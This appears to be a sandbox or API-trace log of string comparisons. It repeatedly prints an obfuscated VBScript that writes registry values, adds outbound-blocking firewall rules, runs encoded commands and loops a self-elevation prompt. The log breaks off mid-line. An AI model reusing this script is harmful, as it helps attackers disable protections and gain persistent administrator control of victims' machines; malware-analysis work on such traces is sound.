bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 99 [0223.028] wcsncmp (_String1="licationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0223.028] wcsncmp (_String1="icationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0223.028] wcsncmp (_String1="cationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0223.028] wcsncmp (_String1="ationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0223.028] wcsncmp (_String1="tionname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite 